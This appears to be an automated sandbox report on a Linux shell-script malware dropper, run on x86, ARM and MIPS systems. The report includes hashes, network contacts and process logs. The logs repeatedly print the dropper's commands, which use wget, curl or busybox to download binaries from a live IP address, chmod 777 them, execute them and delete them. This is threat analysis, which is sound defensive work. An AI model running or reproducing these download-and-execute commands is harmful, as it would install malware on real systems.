Malware Analysis Report

2025-04-03 19:36

Sample ID: 241028-cjjanavpg1
Target: 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
SHA256: 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24
Tags: defense_evasion, antivm, discovery
Score: 7/10

Analysis Overview

score
7/10

SHA256

0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24

Threat Level: Shows suspicious behavior

The file 0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 02:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 02:06

Reported

2024-10-28 02:08

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

21s

Max time network

129s

Command Line

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Writes file to tmp directory

Processes

/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.61:443 tcp
US 151.101.65.91:443 tcp
GB 195.181.164.15:443 tcp

Files

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 02:06

Reported

2024-10-28 02:08

Platform

debian9-armhf-20240611-en

Max time kernel

25s

Max time network

26s

Command Line

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A

Processes

/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/852-1-0xb674f000-0xb6760044-memory.dmp

memory/858-2-0xb6759000-0xb676a044-memory.dmp

memory/882-3-0xb670d000-0xb671e044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 02:06

Reported

2024-10-28 02:08

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

154s

Command Line

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A

Processes

/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

